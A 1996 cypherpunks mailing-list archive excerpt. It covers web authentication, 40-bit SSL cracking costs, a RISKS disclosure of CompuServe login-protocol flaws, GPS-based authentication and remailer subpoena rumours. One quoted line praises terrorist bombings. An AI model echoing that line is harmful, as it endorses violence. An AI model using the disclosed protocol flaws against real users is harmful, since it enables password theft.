ended up shooting yourself in your own foot.

When you said:

>>> >Funny, the latest primary has been one of the highest voter turn outs in 
>>> >quite a while (except in Deleware).  Considering those are the law-and-order 
>>> >types who are most likely to invade personal liberities, I think its a 
>>> >bit hard to make the case that the temper of the country is anything but 
>>> >very pro-political process.

I pointed out, correctly, that mere participation in the vote doesn't 
evidence any claim that a person is "very pro-political process."   You've 
done a piss-poor job defending this.   And you've forgotten that to whatever 
extent voter turnout is up with respect to past years, it is only "up" 
because it has been dramatically down for decades.  You need to explain why 
a citizen, or citizens as a group, should be obligated to tolerate this 
political situation for decades without doing anything to bypass the 
political system when they appear to not believe in a reasonable likelihood 
that it'll fix itself.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stillson@ashd.com (Chris Stillson)
Date: Wed, 10 Apr 1996 14:44:53 +0800
To: cypherpunks@toad.com
Subject: Re: WWW User authentication
Message-ID: <199604092100.QAA21158@bach.ashd.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 4/9/96 -0400, Jeff Barber wrote:
>Brian C. Lane writes:
>
>>   I just finished writing a cgi script to allow users to change their login
>> passwords via a webpage. I currently have the webpage being authenticated
>> with the basic option (uuencoded plaintext). MD5 would be nicer, but how
>> many browsers actually support it?
>
>AFAIK, none.  I don't see how this would be helpful anyway.  If you 
>MD5 the password, I won't be able to snoop the password off the wire,
>but I can simply snoop the MD5 hash off the wire instead and since 
>that's what your authentication check must now be against, what does
>this buy you?
>
>

Well, that isn't exactly how digest authentication works.
In fact mister barber should figure out what he is talking about
before saying anything.  But, you can't really use a hash function
to send the new password.  


>>   When the user changes their password, the form sends their name, old
>> password, and new password with it, in the clear. This is no worse than
>> changing your password across a telnet connection, but I'd like it to be
>> more secure, but useable by a large number of browsers.
>> 
>>   Any advice?
>
>Well, if you use SSL, it's useable by a "large number of browsers" since
>Netscape has such a large share of the browser market.  And then all of
>the things you're doing w.r.t. authentication are hidden, at least from
>casual eavesdroppers and others too if you use more than the 40-bit option.
>There's really no other choice to reach a large number of browsers.
>
>
>-- Jeff

Once again mister barber is being an idiot.  netscape is not a "large number
of browsers".  He is right that ssl is probably a good way to go. (shttp would
be better :) )

You might be able to hack something together with java that did some kind of
clever thing, but then you are limited again.

CGI just isn't made for sending secure information.

As far as digest (MD5) authenitcation goes, I know that the spyglass
browser, and most of its derivatives (like m-soft i-net explorer) can use
it.  I know cause I did a lot of the QA on it.  The real problem is finding
a server that supports it.  I don't know if apache or ncsa do, but they
could probably be hacked to do it.  If you download a spyglass server, I
know it works (I did a lot of the early QA on that too ).  

But that probably doesn't  help too much.
You should probaly find something better than the web to do it.

Chris

############################################
Chris Stillson
Chief Rocket Scientist
Resident Web Geek
Hip Young Nerd
Second Rate graphic designer
Unix Guru
In other words, Webmaster
American Software & Hardware Distributors
fluffy@ashd.com
Check out our web site-> http://www.ashd.com
Cause I did it all....
stop the CDA. Check
http://www.eff.org
############################################






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 10 Apr 1996 22:23:17 +0800
To: blane@aa.net (Brian C. Lane)
Subject: Re: WWW User authentication
Message-ID: <199604092101.QAA23912@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>   I just finished writing a cgi script to allow users to change their login
> passwords via a webpage. I currently have the webpage being authenticated
> with the basic option (uuencoded plaintext). MD5 would be nicer, but how
> many browsers actually support it?

A straight MD5 probably isn't supported by any of them, but then again
MD5 is not necessarily going to help too much.  The sort of people
that need a web page to change their password aren't likely to
use overly complex passwords (mixed-case, scrambled-in numbers,
et al.)  So if a snoop can get the MD5, her chances of getting a password
aren't all that bad.
 
>   When the user changes their password, the form sends their name, old
> password, and new password with it, in the clear. This is no worse than
> changing your password across a telnet connection, but I'd like it to be
> more secure, but useable by a large number of browsers.

Your best bet is to try to implement it via SSL, but as I understand
it that limits you on your server options quite a bit.  Netscape and
Apache have it, as I understand; I think that's about it actually.
But that's far from my areas of expertise.


dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 10 Apr 1996 14:32:29 +0800
To: cypherpunks@toad.com
Subject: Re: WWW User authentication
In-Reply-To: <199604091558.LAA22026@jafar.sware.com>
Message-ID: <9604092033.AA27923@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> AFAIK, none.  I don't see how this would be helpful anyway.  If you 
> MD5 the password, I won't be able to snoop the password off the wire,
> but I can simply snoop the MD5 hash off the wire instead and since 
> that's what your authentication check must now be against, what does
> this buy you?

	It would require a previous shared secret, but wouldn't the
following protocol work (pardon my ASCII diagram):

	Q - Shared secret; Both server and client know this
	R - Random challenge;  Server sends in clear to client wanting
		to be authenticated.

	Server			Client
1)				Request auth
2)	Send R 
3)				Send back MD5( R, Q )
4)	Compare recieved value
	to computed value	

	Granted this straight off the cuff, and you can't securely
change Q via this protocol (unless you store previous MD5(R,Q)'s and
use that as the next Q (i.e. Q_n+1 = MD5(R,Q_n))).  Once someone gets
MD5 in Java done, you could send an applet that would handle the
protocol client side.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 10 Apr 1996 22:21:47 +0800
To: cypherpunks@toad.com
Subject: Re: Job at C2.NET
In-Reply-To: <199604091734.KAA01513@atropos.c2.org>
Message-ID: <199604092335.QAA14762@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> JUNIOR SYSTEM ADMINISTRATOR / TECHNICAL SUPPORT 

My experience has been that few people flock to apply for 
jobs whose titles contain certain magic words like "junior"
or "trainee."  Such things can be embarrassing when explaining
to professional friends exactly what one does for a living. 

Since titles cost nothing, compared to real perqs like an office
with a window, expensive furniture, or sliding doors opening out
into a lush tropical garden, it behooves employers to make them
as impressive-sounding as possible.  It's sort of the high-tech
version of McDonalds' "Burger Flipper of the Month" plaque.

Might I therefore suggest some alternatives...

             DEPUTY SYSTEM ADMINISTRATOR
             ASSISTANT DIRECTOR OF SYSTEM ADMINISTRATION
             SENIOR TECHNICAL CONSULTANT, UNIX SERVER DIVISION
             SENIOR VICE PRESIDENT FOR ONLINE SERVICES
             

Nothing to do with crypto, of course, but it does help to give 
the junior dorks some self-esteem.  :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 10 Apr 1996 12:14:13 +0800
To: froomkin@law.miami.edu>
Subject: Re: Singapore & the net
In-Reply-To: <Pine.SUN.3.91.960409121152.4778I-100000@viper.law.miami.edu>
Message-ID: <AlOhGTG00YUvMZAX8K@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Apr-96 Singapore & the net by
Michael Froomkin@law.mia 
> Reuters reports Singapore has issued new regulations relating to the 
> Internet today.  Anyone have a pointer or details?

Some Singapore lawyerperns have responded to my net.censorship update
page with corrections. I'll track down the mail and forward to the list.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>
Date: Wed, 10 Apr 1996 04:18:09 +0800
To: sameer@c2.org
Subject: Re: Bank transactions on Internet
In-Reply-To: <199604081941.MAA00812@atropos.c2.org>
Message-ID: <Pine.GSO.3.92.960409171558.9284C-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996 sameer@c2.org wrote:

> > > Suddenly some banks here in Estonia have decided that they must start
> > > offering banking services over Internet already during the next months.
> > > What worries me is that some of them are talking about using 40-bit SSL as
> > > the main security mechanism.
>
> 	Please point these banks to Apache-SSL
> (http://www.algroup.co.uk/Apache-SSL/). They can run SSL without
> using 8-cent RC4.

What is the use of 128-bit server, as there are still no 128-bit WWW
clients freely available in Europe? (Workhorse has 128-bit SSL, but the
client is still far from perfect).

Of course I believe that SSL server with source code available is still
much more secure, as your own consultants can have a look at the code,
that's why I personally would rate Apache-SSL higher than commercial
applications like Thawte consulting Sioux.

Jüri Kaljundi
jk@digit.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>
Date: Wed, 10 Apr 1996 04:32:35 +0800
To: Jim Philips <jimp@sfnb.com>
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604081946.AA00048@saloon.fivepaces.com>
Message-ID: <Pine.GSO.3.92.960409172308.9284D-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996, Jim Philips wrote:

> I work with Security First. I would like to add that we use SSL 128 bit key
> with 40 secret, but it is not the only security feature we have. So far, it
> has been the means for encrypting data coming to and from the Bank. We also
> have a site certificate from Verisign and multiple layers of internal
> security at the site. I cannot agree that this encryption is "worthless".

As far as I understand anyone can fairly easy crack the 40-bit SSL your
bank is using, and you must be lucky nobody has done it yet with your
account. Still it seems odd that banks are telling their customers about
secure communications without having any real security.

Jüri Kaljundi
jk@digit.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>
Date: Wed, 10 Apr 1996 04:34:44 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Bank transactions on Internet
In-Reply-To: <199604090025.UAA28599@jekyll.piermont.com>
Message-ID: <Pine.GSO.3.92.960409173030.9284E-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996, Perry E. Metzger wrote:

> The rest of this article is a direct quotation from Blaze et al in the
> paper they wrote on minimal safe key lengths. Note that they show that
> it is easy enough to make a cracker that costs eight cents (CENTS!)
> per solution, and not that hard to get it down to 1/10th of a cent!
>
> }    There is no need to have the resources of an institution of higher
> }education at hand, however.  Anyone with a modicum of computer
> }expertise and a few hundred dollars would be able to attack 40-bit
> }encryption much faster.  An FPGA chip --- costing approximately $400
> }mounted on a card --- would on average recover a 40-bit key in five
> }hours.  Assuming the FPGA lasts three years and is used continuously
> }to find keys, the average cost per key is eight cents.

This AT&T Orca or FPGA chip or whatever the name is, is it freely
available device and how easy would it be to get one? I am not sure I
understand what it is, but even in case you would have to write the code
to crack RC4 and program the chip yourself, that does not seem very hard
thing to do. What I am asking is if this cracking device would be
available to anyone with 400$ and some computer knowledge?

Jüri Kaljundi
jk@digit.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Apr 1996 18:41:25 +0800
To: unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u6pfx-00090gC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 PM 4/9/96 -0700, Bill Frantz wrote:
>At  3:21 PM 4/9/96 -0800, jim bell wrote:
>>And the rest of us are tired of seeing those non-responses!
>
>I wish to state that Jim Bell does not speak for me.

Tell me, what is the most exciting, interesting, and imaginative usage of 
"Yadda Yadda Yadda" that _you_ remember, Bill?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 10 Apr 1996 14:06:11 +0800
To: cypherpunks@toad.com
Subject: [reputationpunks] Article on Moody's
Message-ID: <Pine.3.89.9604091832.A19718-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This week's Economist has a nice tidbit on bond rating agencies and 
antitrust on page 80. A comment on firms that trade mostly on their reps.
Is an unsolicited rating by a for-profit agency an act of free speach
or an act of defamation?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 10 Apr 1996 19:34:22 +0800
To: cypherpunks@toad.com
Subject: RISKS: Compuserve "secure" login
Message-ID: <v01540b01ad90cf8c8249@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------

Date: Thu, 04 Apr 1996 19:34:12 +0200
From: Heinz-Bernd Eggenstein <eggenste@noether.informatik.uni-dortmund.de>
Subject: CompuServe's "secure login protocol": two steps forward, one back

Summary: a new CompuServe Information Service (CIS) logon protocol was
designed to prevent passive and active attacks (where the attacker
impersonates a CompuServe node) but a flawed implementation in the
WinCIM 2.0(.1) client software still allows active attacks.

Version 2.0 of the "WinCIM" access software introduced a new logon protocol.
Previous versions of the software had transmitted the user's UID AND his/her
password in plaintext during logon. The risks are obvious, especially when
connecting via the Internet to CompuServe (e.g. to save long distance
telephone charges).

The new, "secure logon protocol" is a challenge-response type protocol where
the "challenge" is to compute a keyed hash-function, the key is derived from
the shared secret, the user's password:

1) The client (WinCIM) generates a pseudorandom string of bits, its "nonce"
   (RB)
2) The client transmits the user's UID (e.g. 12345,6789) and the additional
   parameter "/secure:1" to request a secure login.
3) The host transmits its pseudo random nonce (RA) (The old protocol would
   instead prompt for the password)
4) client sends RB to the host
5) client computes  UR:=MD5(S|Z|RA|RB|S) and sends it to the host
   (where S (128 bits) is a function of the password, "|" stands for
   concatenation, Z is a 128bits block of 0s and MD5 is the well
   known message digest function.)
6) The host performs the same calculation with it's copy of the user's
   password. If the results match, the host sends HR:=MD5(S|Z|RB|RA|S)
   (Note the symmetry in the calculation of HR and UR)
7) The client software verifies HR with it's copy of the password to
   make sure the host is really a CIS node (!)

(See the script-files cserve.scr and seclog.scr in the subdirectory SCRIPTS
of a WINCIM 2.0(.1) installation, WinCim is available via anon. ftp
at ftp.compuserve.com).

Weaknesses:

a) The scriptfile cserve.scr (versions 3.8 & 3.8.1) has the following bug:
   even after requesting a secure logon, the client software will fall back
   into the old protocol when receiving a "Password" prompt (Client: "I want
   a secure logon" Host:"OK, but anyway, give me your password" Client "Well
   ok then, here it is ..."). It will send the password in plaintext! This
   makes the protection against active attacks (see step 7) obsolete.

b) A timeout condition or even an invalid HR response form the host will
   (seclog.scr & cserve.scr version 3.8.1) restart the protocol (it won't
   disconnect!), using *the same* client-nonce RB again, instead of
   generating a new one. If a spoofing host can predict RB as in this
   situation, it can pick the same nonce, leading to HR=UR=MD5(S|Z|RB|RB|S),
   so the host can just send back UR as HR.

Note that unlike a), b) does not compromise the user's password.

There may be other ways to predict the client software's nonce e.g. *if* the
PRNG used by WinCIM is predictable (this calls for further investigation).

Note that *offline* dictionary attacks to guess the password are possible
after a passive, eavesdropping attack (so you still have to pick a "good"
password). It's debatable whether CIS's password recommendation
(<word><non-alphanum. char.><word>, both words unrelated, e.g.
apple@battery) is adequate in this context).

I notified CIS about these weaknesses and I was informed that they are
"fixed" now, no details were given about the fix (source: Britta Herbst,
German customer support (11111.754@compuserve.com)).

Risks? The new protocol is obviously an improvement over the old,
plaintext-password-only version. It's debatable whether protection against
active attacks is at all necessary for access to an online service. However,
CIS itself designed it's protocol to prevent spoofing attacks. Anyway, I
think this a good example how to half-ruin a good protocol by embedding it
into carelessly written code.

Credits: Thanks to Gary Brown (70003.1215@compuserve.com) for sending me
information on the implementation of the new protocol).

Heinz-Bernd Eggenstein [usual disclaimers]

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Wed, 10 Apr 1996 08:19:49 +0800
To: cypherpunks@toad.com
Subject: Re: They're running scared.
In-Reply-To: <199604081638.MAA03875@Fe3.rust.net>
Message-ID: <Pine.HPP.3.91.960409185501.7014B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996, Michael C. Peponis wrote:

> Personally, I love national insecurity such as terrorist attacks and 
> random bombings, wish there were more of them by more people.

A big problem with random bombings is that one self can become part
of the random targets.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 10 Apr 1996 18:39:47 +0800
To: cypherpunks@toad.com
Subject: Scientologists may subpoena anonymous remailer records
Message-ID: <199604100202.TAA16568@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought that most or all of the cypherpunk anonymous remailers don't
keep records.  Not even on backup tapes.  The whole idea is that there
aren't logs.  But maybe they have found some remailers that are
non-cypherpunk.  And I haven't verified the truth of what's in the msg
below.  If anyone hears anything, please let me (or eff@eff.org) know.

	John Gilmore

Date: Tue, 9 Apr 1996 18:27:02 -0700
To: fight-censorship+@andrew.cmu.edu, eric@remailer.net,
        farber@cis.upenn.edu (Dave Farber)
From: jwarren@well.com (Jim Warren)
Subject: (fwd fyi - NOT verified!!)  very urgent news

Seems like it's just a tad overbroad, if true.  Another example of, "all
the 'justice' that one can buy"?

--jim

>Date: Tue, 9 Apr 1996 15:44:52 -0700 (PDT)
>From: shelley thomson <sthomson@netcom.com>
>Subject: very urgent news
>To: jwarren@well.com
>
>Hello, Jim Warren:
>
>        The church of scientology plans to subpoena the records of every
>anonymous remailer in the USA.
>
>        I publish a news/black humor magazine on the net called **Biased
>Journalism**.  As a journalist I have covered the collision between the
>church of scientology and the net.  My last three issues have focused on
>legal action by the church against Grady Ward and Keith Henson.
>
>        Today I had a note from Grady Ward, whose deposition was finished
>today.  He said that they asked him a lot of questions about me, and
>warned me that they may issue a subpoena for me and a demand for my
>email.
>
>        The church presumably intends to claim that I am not a real
>journalist because I only publish on the net.  I need to prepare a legal
>defense, and needless to say, can't afford a lawyer.  If you can direct
>me to any resources, I would appreciate it very much.
>
>        On the basis of events today, Ward believes the church will
>issue subpoenas for the records of every anonymous remailer in the USA.
>
>        If these records are delivered to the church, our First Amendment
>rights go with them.
>
>        Shelley Thomson
>
>        publisher, **Biased Journalism**
>        800-731-0717 voice message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 10 Apr 1996 18:38:04 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <Pine.SUN.3.91.960409192104.24728B-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Black Unicorn wrote:

> >I didn't respond to this part originally because I grew tired of typing
> >"Yadda yadda yadda" everytime Mr. Bell lapsed into another
> >psycho-political babble session.

To which Jim Bell wrote:
 
> And the rest of us are tired of seeing those non-responses!

Exactly for whom is Bell speaking?  Jimbo, please let us know 
who has given you a limited powers of attorney to be their
mouthpiece.  It's sad when someone (correctly) deems their
opinions too weak to stand without (dare I say it?) pseudo-
spoofing by reference.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 10 Apr 1996 19:04:15 +0800
To: cypherpunks@toad.com
Subject: No matter where you go, there they are.
Message-ID: <199604091750.TAA13469@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Location-based System Delivers User
Authentication Breakthrough

By Dorothy E. Denning and Peter F. MacDoran
Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
Top - Help



Existing user authentication mechanisms are based on information the user
knows (e.g., password or PIN), possession of a device (e.g, access token or
crypto- card), or information derived from a personal characteristic
(biometrics). None of these methods are foolproof. Passwords and PINs are
often vulnerable to guessing, interception or brute force search. Devices
can be stolen. Biometrics
can be vulnerable to interception and replay.

A new approach to authentication utilizes space geodetic methods to form a
time- dependent location signature that is virtually impossible to forge.
The signature is used to determine the location (latitude, longitude and
height) of a user attempting to access a system, and to reject access if
the site is not approved for that user. With location-based controls, a
hacker in Russia would be unableto log into a funds transfer system in the
United States while pretending to come from a bank in Argentina.

Location-based authentication can be used to control access to sensitive
systems, transactions or information. It would be a strong deterrent to
many potential intruders, who now hide behind the anonymity afforded by
their remote locations and fraudulent use of conventional authentication
methods. If the fraudulent actors were required to reveal their location in
order to gain access, their anonymity would be significantly eroded and
their chances of getting caught would increase.

Authentication through geodetic location has other benefits. It can be
continuous, thereby protecting against channel hijacking. It can be
transparent to the user. Unlike most other types of authentication
information, a user's location can serve as a common authenticator for all
systems the user accesses. These features make location-based
authentication a good technique to use in conjunction with single log-on.
Another benefit is there is no secret information to protect either at the
host or user end. If a user's authentication device is stolen, use of the
device will not compromise the system but only reveal the thief's location.
A further benefit of geodetic-derived location signatures is that they
provide a mechanism for implementing an electronic notary function. The
notary could attach a location signature to a document as proof that the
document existed at a
particular location and instant in time.

The use of geographic location can supplement or complement other methods
of authentication, which are still useful when users at the same site have
separate accounts and privileges. Its added value is a high level of
assurance against intrusion from any unapproved location regardless of
whether the other methods have been compromised. In critical environments,
for example, military command and control, telephone switching, air traffic
control, and banking, this extra assurance could be extremely important in
order to avoid a potential catastrophe with reverberations far beyond the
individual system cracked.

How it works

International Series Research (Boulder, CO) has developed a technology for
achieving location-based authentication. Called CyberLocator, the
technology makes use of the microwave signals transmitted by the
twenty-four satellite constellation of the Global Positioning System (GPS).
Because the signals are everywhere unique and constantly changing with the
orbital motion of the satellites, they can be used to create a location
signature that is unique to a particular place and time. The signature,
which is computed by a special GPS sensor connected to a small antenna, is
formed from bandwidth compressed raw observations of all the GPS satellites
in view. As currently implemented, the location signature changes every
five milliseconds. However, there are options to
create a new signature every few microseconds.

When attempting to gain access to a host server, the remote client is
challenged to supply its current location signature. The signature is then
configured into packets and transferred to the host. The host, which is
also equipped with a GPS sensor, processes the client signature and its own
simultaneously acquired satellite signals to verify the client's location
to within an acceptable threshold (a few meters to centimeters, if
required).

For two-way authentication, the reverse process would be performed. In the
current implementation, location signatures are 20,000 bytes. For
continuous authentication, an additional 20 bytes per second are
transferred. Re- authorization can be performed every few seconds or
longer. The location signature is virtually impossible to forge at the
required accuracy. This is because the GPS observations at any given time
are essentially unpredictable to high precision due to subtle satellite
orbit perturbations, which are unknowable in real-time, and intentional
signal instabilities  (dithering) imposed by the U.S. Department of Defense
selective availability (SA) security policy. Further, because a signature
is invalid after five milliseconds, the attacker cannot spoof the location
by replaying an intercepted signature, particularly when it is bound to the
message (e.g., through a checksum or digital signature). Continuous
authentication provides further protection against such attacks.

Conventional (code correlating and differential) GPS receivers are not
suitable for location authentication because they compute latitude,
longitude and height directly from the GPS signals. Thus, anyone can report
an arbitrary set of coordinates and there is no way of knowing if the
coordinates were actually calculated by a GPS receiver at that location. A
hacker could intercept the coordinates transmitted by a legitimate user and
then replay those coordinates in order to gain entry. Typical code
correlating receivers, available to civilian users, are also limited to 100
meter accuracy. The CyberLocator sensors achieve meter (or better) accuracy
by employing differential GPS techniques at the host, which has access to
its own GPS signals as well as those of the client. DGPS methods attenuate
the satellite orbit errors and cancel SA dithering effects.

Where it works

Location-based authentication is ideal for protecting fixed sites. If a
company operates separate facilities, it could be used to restrict access
or sensitive transactions to clients located at those sites. For example, a
small (7 cm x 7 cm) GPS antenna might be placed on the rooftop of each
facility and connected by cable to a location signature sensor within the
building. The sensor, which would be connected to the site's local area
network, would authenticate the location of all users attempting to enter
the protected network. Whenever a user ventured outside the network, the
sensor would supply the site's location signature. Alternatively, rather
than using a single sensor, each user could be given a separate device,
programmed to provide a unique signature for that user. Location-based
authentication could facilitate telecommuting by countering the
vulnerabilities associated with remote access over dial-in lines and
Internet connections. All that would be needed is a reasonably
unobstructed view of the sky at the employee's home or remote office.
Related application environments include home banking, remote medical
diagnosis and remote process control. Although it is desirable for an
antenna to be positioned with full view of the sky, this is not always
necessary. If the location and environment are known in advance, then the
antenna can be placed on a window with only a limited view of the sky. The
environment would be taken into account when the signals are processed at
the host.

For remote authentication to succeed, the client and host must be within
2,000 to 3,000 kilometers of each other so that their GPS sensors pick up
signals from some of the same satellites. By utilizing a few regionally
deployed location signature sensors (LSS), this reach can be extended to a
global basis. For example, suppose that a bank in Munich needs to conduct a
transaction with a bank in New York and that a London-based LSS provides a
bridge into Europe. Upon receiving the location signatures from London and
Munich, the New York bank can verify the location of the Munich bank
relative to the London LSS and the London LSS relative to its own location
in New
York.

The technology is also applicable to mobile computing. In many situations,
it would be possible to know the general vicinity where an employee is
expected to be present and to use that information as a basis for
authentication. Even if the location cannot be known in advance, the mere
fact that remote users make their locations available will substantially
enhance their authenticity. In his new book, The Road Ahead, Bill Gates
predicts that wallet PCs, networked to the information highway, will have
built-in GPS receivers as navigational assistants. With the CyberLocator
technology, these PC receivers can also perform authentication while being
a factor of ten less expensive than conventional code correlating receivers
(most of the processing is executed in the host rather than
the remote units), which only achieve 100 meter accuracy, and a factor of a
hundred less expensive than conventional DGPS receivers. Location-based
authentication is a powerful new tool that can provide a new dimension of
network security never before possible. The CyberLocator technology is
currently operational in a portable demonstration.


Dorothy E. Denning is professor of computer science at Georgetown
University (Washington, D.C.) and consultant to ISR. She can be reached at
202-687-5703 or denning@cs.georgetown.edu. Peter F. MacDoran is president
and CEO of International Series Research, Inc. (Boulder, CO). He can be
reached at 303-447- 0300 or pmacdorn@isrinc.com.


$0$AD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Wed, 10 Apr 1996 19:43:11 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't   Work
In-Reply-To: <199604090654.XAA16860@dns2.noc.best.net>
Message-ID: <199604100204.VAA30139@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Mike McNally writes:

MM> jamesd@echeque.com wrote:
>> > If I don't shave over the > weekend will my computer know who I
>> am Monday morning?
>> 
>> Shaving probably will not be a problem, but holding your head at a
>> slightly different angle, or having slightly different lighting, or
>> combing your hair differently will screw up the system totally,
>> unless the system has radically improved since the last time I read
>> up on it.

MM> There are supposedly some new techniques that look at the infrared
MM> signature of your face (like, I guess, distribution & position of
MM> hot & cold spots), and that's less likely to be fooled by facial
MM> hair and other superficial disguises.  It's probably a fairly
MM> simple technology, and could be applied to the credit card ID
MM> problem.

	So if I'm running a fever, or just been exercising, it
wouldn't recognize me, right?  Doesn't sound like that would be much
better.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
ObCDABait:      For she doted upon their paramours, whose flesh is as the
flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 10 Apr 1996 18:54:36 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Federal Bureau of Indigestion
Message-ID: <199604100144.VAA00629@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 09, 1996 14:24:47, 'jim bell <jimbell@pacifier.com>' wrote: 
 
 
>At 09:15 AM 4/9/96 -0700, Dave Del Torto wrote: 
>>[forwards mercifully elided] 
>> 
>>FBI agents conducted a raid of a psychiatric hospital in San Diego that
was 
>>under investigation for medical insurance fraud. After hours of reviewing

>>thousands of medical records, the dozens of agents had worked up quite an

>>appetite. The agent in charge of the investigation called a nearby pizza 
>>parlor with delivery service to order a quick dinner for his colleagues. 
> 
>Funny stuff deleted. 
> 
>>PM:	   And everyone at the psychiatric hospital is an FBI agent? 
>>Agent:	   That's right. We've been here all day and we're starving. 
>>PM:	   How are you going to pay for all of this? 
>>Agent:	   I have my checkbook right here. 
>>PM:	   And you're _all_ FBI agents? 
>>Agent:	   That's right. Everyone here is an FBI agent. Can you remember 
>>	   to bring the pizzas and sodas to the service entrance in the rear? 
>>	   We have the front doors locked. 
>>Pizza Guy: I don't _think_ so...  >click< 
> 
>I'm waiting for Unicorn to claim that the next phone call to the pizza
shop  
>was from a judge, who was placing a subpoena on the next 19 pizzas that
shop  
>produced, and ordered them delivered to the hospital for psychiatric  
>evaluation.  B^) 
> 
>Jim Bell 
>jimbell@pacifier.com 
> 
> 
 
Never trust or wait for lawyers, Jim. 
 
Go directly to the psychiatric hospital. Go to the back door. Tell them
you're only there to do research. 
 
--tallpaul 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Wed, 10 Apr 1996 19:07:45 +0800
To: "Frank O. Trotter, III" <fotiii@crl.com>
Subject: Re: Bulletin: Cypherpunks say no taxes owed by moneychangers!
In-Reply-To: <199604090336.AA03230@mail.crl.com>
Message-ID: <Pine.SV4.3.91.960409213907.10780E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Mon, 8 Apr 1996 22:43:55 -5
> From: Frank O. Trotter, III <fotiii@crl.com>
> Aside from ecash, helping people to exchange currency is my day job
> so I see this all the time, especially this month each year.

  There is a guy in Tennessee who publishes a newsletter called _The 
Moneychanger_.  He is one of those Constitutionalists. He did put himself 
through hell to get acquited of an IRS charge - he is a dealer in gold 
